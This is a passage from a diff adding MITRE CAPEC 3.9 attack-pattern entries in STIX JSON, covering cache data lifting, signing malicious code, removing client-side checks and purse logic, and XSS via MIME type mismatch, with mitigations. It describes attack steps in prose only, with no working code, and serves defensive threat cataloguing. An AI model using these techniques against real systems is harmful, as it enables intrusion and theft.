"relationship--cc7d659b-2cb2-439c-aea4-42aea4f82adc", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ffb43c3c-114d-4da2-b797-b8e458ebd6fa", + "spec_version": "2.1", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ a robust and layered defensive posture in order to prevent unauthorized users on your system.", + "id": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--999b1481-d5c3-444d-8eed-b7f921aa8bdf", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c745fa6-97fd-4aa7-830c-2522e1df5ea6", + "spec_version": "2.1", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Employ robust identification and audit/blocking using an allowlist of applications on your system. Unnecessary applications, utilities, and configurations will have a presence in the system registry that can be leveraged by an adversary through this attack pattern.", + "id": "course-of-action--2966a770-a439-475c-8cc1-418b64736efe", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-203-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90f1e2e6-849c-4469-b78d-75ed3dfe70e3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2966a770-a439-475c-8cc1-418b64736efe", + "spec_version": "2.1", + "target_ref": "attack-pattern--e283aef8-250b-4ac9-bf8b-34a6a70ed2f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary examines a target application's cache, or a browser cache, for sensitive information. Many applications that communicate with remote entities or which perform intensive calculations utilize caches to improve efficiency. However, if the application computes or receives sensitive information and the cache is not appropriately protected, an attacker can browse the cache and retrieve this information. This can result in the disclosure of sensitive information.", + "external_references": [ + { + "external_id": "CAPEC-204", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-524", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/524.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "external_id": "CWE-1239", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1239.html" + }, + { + "external_id": "CWE-1258", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1258.html" + }, + { + "description": "Data from Local System", + "external_id": "T1005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1005" + } + ], + "id": "attack-pattern--c2a87533-3c81-40b3-b529-9560c644f70d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Lifting Sensitive Data Embedded in Cache", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify Application Cache: An adversary first identifies an application that utilizes a cache. This could either be a web application storing data in a browser cache, or an application running on a separate machine. The adversary examines the cache to determine file permissions and possible encryption.

    2. Techniques
    Use probing tools to look for application cache files on a machine.
    Use a web application and determine if any sensitive information is stored in browser cache.

Experiment

  1. Attempt to Access Cache: Once the cache has been discovered, the adversary attempts to access the cached data. This often requires previous access to a machine hosting the target application.

    2. Techniques
    Use priviledge escalation to access cache files that might have strict privileges.
    If the application cache is encrypted with weak encryption, attempt to understand the encryption technique and break the encryption.

Exploit

  1. Lift Sensitive Data from Cache: After gaining access to cached data, an adversary looks for potentially sensitive information and stores it for malicious use. This sensitive data could possibly be used in follow-up attacks related to authentication or authorization.

    2. Techniques
    Using a public computer, or gaining access to a victim's computer, examine browser cache to look for sensitive data left over from previous sessions.
", + "x_capec_prerequisites": [ + "The target application must store sensitive information in a cache.", + "The cache must be inadequately protected against attacker access." + ], + "x_capec_resources_required": [ + "The attacker must be able to reach the target application's cache. This may require prior access to the machine on which the target application runs. If the cache is encrypted, the attacker would need sufficient computational resources to crack the encryption. With strong encryption schemes, doing this could be intractable, but weaker encryption schemes could allow an attacker with sufficient resources to read the file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of CAPEC-37 : Retrieve Embedded Sensitive Data. Please refer to this other pattern going forward.", + "external_references": [ + { + "external_id": "CAPEC-205", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/205.html" + } + ], + "id": "attack-pattern--1d84e8ef-4dc7-45bb-b079-09a0a6233bf9", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Lifting credential(s)/key material embedded in client distributions (thick or thin)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary extracts credentials used for code signing from a production environment and then uses these credentials to sign malicious content with the developer's key. Many developers use signing keys to sign code or hashes of code. When users or applications verify the signatures are accurate they are led to believe that the code came from the owner of the signing key and that the code has not been modified since the signature was applied. If the adversary has extracted the signing credentials then they can use those credentials to sign their own code bundles. Users or tools that verify the signatures attached to the code will likely assume the code came from the legitimate developer and install or run the code, effectively allowing the adversary to execute arbitrary code on the victim's computer. This differs from CAPEC-673, because the adversary is performing the code signing.", + "external_references": [ + { + "external_id": "CAPEC-206", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/206.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "description": "Subvert Trust Controls:Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + }, + { + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien, W32.Stuxnet Dossier, 2010--11, Symantec", + "external_id": "REF-699", + "source_name": "reference_from_CAPEC", + "url": "https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 3: How software becomes compromised, 2020--03---11, Microsoft", + "external_id": "REF-700", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/03/11/guarding-against-supply-chain-attacks-part-3-how-software-becomes-compromised/" + }, + { + "description": "Operation Wilted Tulip: Exposing a cyber espionage apparatus, 2017--07, ClearSky cyber security and Trend Micro", + "external_id": "REF-714", + "source_name": "reference_from_CAPEC", + "url": "https://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + } + ], + "id": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Signing Malicious Code", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n In the famous Stuxnet malware incident, two digital certificates were compromised in order to sign malicious device drivers with legitimate credentials. The signing resulted in the malware appearing as trusted by the system it was running on, which facilitated the installation of the malware in kernel mode. This further resulted in Stuxnet remaining undetected for a significant amount of time. [REF-699]\n ", + "\n The cyber espionage group CyberKittens leveraged a stolen certificate from AI Squared that allowed them to leverage a signed executable within Operation Wilted Tulip. This ultimately allowed the executable to run as trusted on the system, allowing a Crowd Strike stager to be loaded within the system's memory. [REF-714]\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. The adversary first attempts to obtain a digital certificate in order to sign their malware or tools. This certificate could be stolen, created by the adversary, or acquired normally through a certificate authority.

  2. Based on the type of certificate obtained, the adversary will create a goal for their attack. This is either a broad or targeted attack. If an adversary was able to steal a certificate from a targeted organization, they could target this organization by pretending to have legitimate code signed by them. In other cases, the adversary would simply sign their malware and pose as legitimate software such that any user might trust it. This is the more broad approach

Experiment

  1. The adversary creates their malware and signs it with the obtained digital certificate. The adversary then checks if the code that they signed is valid either through downloading from the targeted source or testing locally.

Exploit

  1. Once the malware has been signed, it is then deployed to the desired location. They wait for a trusting user to run their malware, thinking that it is legitimate software. This malware could do a variety of things based on the motivation of the adversary.

", + "x_capec_prerequisites": [ + "The targeted developer must use a signing key to sign code bundles. (Note that not doing this is not a defense - it only means that the adversary does not need to steal the signing key before forging code bundles in the developer's name.)" + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure digital certificates are protected and inaccessible by unauthorized uses.", + "id": "course-of-action--ba7d1dc7-1157-4e70-bd60-0ffc00081dbb", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9f7392ae-c45b-49fa-9355-c5319538ccd6", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba7d1dc7-1157-4e70-bd60-0ffc00081dbb", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If a digital certificate has been compromised it should be revoked and regenerated.", + "id": "course-of-action--55870da4-61f0-486d-8c7e-a97282372d45", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c4654c1-b126-432b-9cd3-6dcbe787801b", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--55870da4-61f0-486d-8c7e-a97282372d45", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Even if a piece of software has a valid and trusted digital signature, it should be assessed for any weaknesses and vulnerabilities.", + "id": "course-of-action--9d35e87c-32b7-43a8-b58b-befcae839597", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-206-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--44707875-683c-4f12-b340-14848083ceec", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9d35e87c-32b7-43a8-b58b-befcae839597", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary removes or disables functionality on the client that the server assumes to be present and trustworthy.", + "external_references": [ + { + "external_id": "CAPEC-207", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/207.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-75", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Greasemonkey" + }, + { + "description": "Firebug", + "external_id": "REF-76", + "source_name": "reference_from_CAPEC", + "url": "http://getfirebug.com/" + }, + { + "description": "Mozilla Firefox Add-ons", + "external_id": "REF-77", + "source_name": "reference_from_CAPEC", + "url": "https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/" + } + ], + "id": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Removing Important Client Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Other (Information Leakage)", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "The adversary reverse engineers a Java binary (by decompiling it) and identifies where license management code exists. Noticing that the license manager returns TRUE or FALSE as to whether or not the user is licensed, the adversary simply overwrites both branch targets to return TRUE, recompiles, and finally redeploys the binary.", + "The adversary uses click-through exploration of a Servlet-based website to map out its functionality, taking note of its URL-naming conventions and Servlet mappings. Using this knowledge and guessing the Servlet name of functionality they're not authorized to use, the adversary directly navigates to the privileged functionality around the authorizing single-front controller (implementing programmatic authorization checks)." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The adversary probes, through brute-forcing, reverse-engineering or other similar means, the functionality on the client that server assumes to be present and trustworthy.

    2. Techniques
    The adversary probes by exploring an application's functionality and its underlying mapping to server-side components.
    The adversary reverse engineers client-side code to identify the functionality that the server relies on for the proper or secure operation.

Experiment

  1. Determine which functionality to disable or remove: The adversary tries to determine which functionality to disable or remove through reverse-engineering from the list of functionality identified in the Explore phase.

    2. Techniques
    The adversary reverse engineers the client-side code to determine which functionality to disable or remove.

Exploit

  1. Disable or remove the critical functionality from the client code: Once the functionality has been determined, the adversary disables or removes the critical functionality from the client code to perform malicious actions that the server believes are prohibited.

    2. Techniques
    The adversary disables or removes the functionality from the client-side code to perform malicious actions, such as sending of dangerous content (such as scripts) to the server.
", + "x_capec_extended_description": "\n Adversaries can, in some cases, get around logic put in place to 'guard' sensitive functionality or data. Client applications may include functionality that a server relies on for correct and secure operation. This functionality can include, but is not limited to, filters to prevent the sending of dangerous content to the server, logical functionality such as price calculations, and authentication logic to ensure that only authorized users are utilizing the client. If an adversary can disable this functionality on the client, they can perform actions that the server believes are prohibited. This can result in client behavior that violates assumptions by the server leading to a variety of possible attacks. In the above examples, this could include the sending of dangerous content (such as scripts) to the server, incorrect price calculations, or unauthorized access to server resources.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--5c201b0f-aa6f-4220-a544-1e1e7ca8ecf7", + "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05" + ], + "x_capec_prerequisites": [ + "The targeted server must assume the client performs important actions to protect the server or the server functionality. For example, the server may assume the client filters outbound traffic or that the client performs all price calculations correctly. Moreover, the server must fail to detect when these assumptions are violated by a client." + ], + "x_capec_resources_required": [ + "The adversary must have access to a client and be able to modify the client behavior, often through reverse engineering. If the server is assuming specific client functionality, this usually means the server only recognizes a specific client application, rather than a broad class of client applications. Reverse engineering tools would likely be necessary." + ], + "x_capec_skills_required": { + "High": "To reverse engineer the client-side code to disable/remove the functionality on the client that the server relies on.", + "Low": "The adversary installs a web tool that allows scripts or the DOM model of web-based applications to be modified before they are executed in a browser. GreaseMonkey and Firebug are two examples of such tools." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.", + "id": "course-of-action--5b0a3ddb-6d63-403e-8f60-bf821f6b65fe", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c5ee791d-5a7a-424b-8425-74c45b4c310e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5b0a3ddb-6d63-403e-8f60-bf821f6b65fe", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Ship client-side application with integrity checks (code signing) when possible.", + "id": "course-of-action--a354ac27-1c18-44cc-bff5-3b97838a8a13", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bc683ec3-bdbd-4f4b-9388-34935ef7440e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a354ac27-1c18-44cc-bff5-3b97838a8a13", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the client code.", + "id": "course-of-action--3ccd2b17-b570-40d7-967b-b16308019cdb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-207-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--471fb693-94a4-42fa-a5d0-f5f7f15c36a9", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3ccd2b17-b570-40d7-967b-b16308019cdb", + "spec_version": "2.1", + "target_ref": "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker removes or modifies the logic on a client associated with monetary calculations resulting in incorrect information being sent to the server. A server may rely on a client to correctly compute monetary information. For example, a server might supply a price for an item and then rely on the client to correctly compute the total cost of a purchase given the number of items the user is buying. If the attacker can remove or modify the logic that controls these calculations, they can return incorrect values to the server. The attacker can use this to make purchases for a fraction of the legitimate cost or otherwise avoid correct billing for activities.", + "external_references": [ + { + "external_id": "CAPEC-208", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/208.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + } + ], + "id": "attack-pattern--014e5fc2-7564-4775-94aa-220601522b05", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Removing/short-circuiting 'Purse' logic: removing/mutating 'cash' decrements", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The targeted server must rely on the client to correctly perform monetary calculations and must fail to detect errors in these calculations." + ], + "x_capec_resources_required": [ + "The attacker must have access to the client for the targeted service (this step is trivial for most web-based services). The attacker must also be able to reverse engineer the client in order to locate and modify the client's purse logic. Reverse engineering tools would be necessary for this." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a file with scripting content but where the specified MIME type of the file is such that scripting is not expected. The adversary tricks the victim into accessing a URL that responds with the script file. Some browsers will detect that the specified MIME type of the file does not match the actual type of its content and will automatically switch to using an interpreter for the real content type. If the browser does not invoke script filters before doing this, the adversary's script may run on the target unsanitized, possibly revealing the victim's cookies or executing arbitrary script in their browser.", + "external_references": [ + { + "external_id": "CAPEC-209", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-79", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/79.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-646", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/646.html" + }, + { + "description": "OWASP Testing Guide (v4), The Open Web Application Security Project (OWASP)", + "external_id": "REF-78", + "source_name": "reference_from_CAPEC", + "url": "http://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002)" + } + ], + "id": "attack-pattern--b27e3b46-2838-4339-a570-006474c8c402", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XSS Using MIME Type Mismatch", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "For example, the MIME type text/plain may be used where the actual content is text/javascript or text/html. Since text does not contain scripting instructions, the stated MIME type would indicate that filtering is unnecessary. However, if the target application subsequently determines the file's real type and invokes the appropriate interpreter, scripted content could be invoked.", + "In another example, img tags in HTML content could reference a renderable type file instead of an expected image file. The file extension and MIME type can describe an image file, but the file content can be text/javascript or text/html resulting in script execution. If the browser assumes all references in img tags are images, and therefore do not need to be filtered for scripts, this would bypass content filters." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for stored user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all areas that allow a user to upload content through an HTTP POST request. This is typically found in blogs or forums.

    2. Techniques
    Use a spidering tool to follow and record all links and analyze the web pages to file upload features
    Use a proxy tool to record all links visited during a manual traversal of the web application.
    Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

  1. Probe identified potential entry points for MIME type mismatch: The adversary uses the entry points gathered in the \"Explore\" phase as a target list and uploads files with scripting content, but whose MIME type is specified as a file type that cannot execute scripting content. If the application only checks the MIME type of the file, it may let the file through, causing the script to be executed by any user who accesses the file.

    2. Techniques
    Upload a script file with a MIME type of text/plain to a forum and then access the uploaded file to see if the script is executed. If possible, the script displays a unique identifier so the adversary knows for certain it was executed when testing.

  2. Store malicious XSS content: Once the adversary has determined which file upload locations are vulnerable to MIME type mismatch, they will upload a malicious script disguised as a non scripting file. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from a victim.

    3. Techniques
    Use a tool such as BeEF to store a hook into the web application. This will alert the adversary when the victim has accessed the content and will give the adversary control over the victim's browser, allowing them access to cookies, user screenshot, user clipboard, and more complex XSS attacks.

Exploit

  1. Get victim to view stored content: In order for the attack to be successful, the victim needs to view the stored malicious content on the webpage.

    2. Techniques
    Send a phishing email to the victim containing a URL that will direct them to the malicious stored content.
    Simply wait for a victim to view the content. This is viable in situations where content is posted to a popular public forum.
", + "x_capec_prerequisites": [ + "The victim must follow a crafted link that references a scripting file that is mis-typed as a non-executable file.", + "The victim's browser must detect the true type of a mis-labeled scripting file and invoke the appropriate script interpreter without first performing filtering on the content." + ], + "x_capec_resources_required": [ + "The adversary must have the ability to source the file of the incorrect MIME type containing a script." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses, obtains, or \"rides\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-21", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/21.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-642", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/642.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": 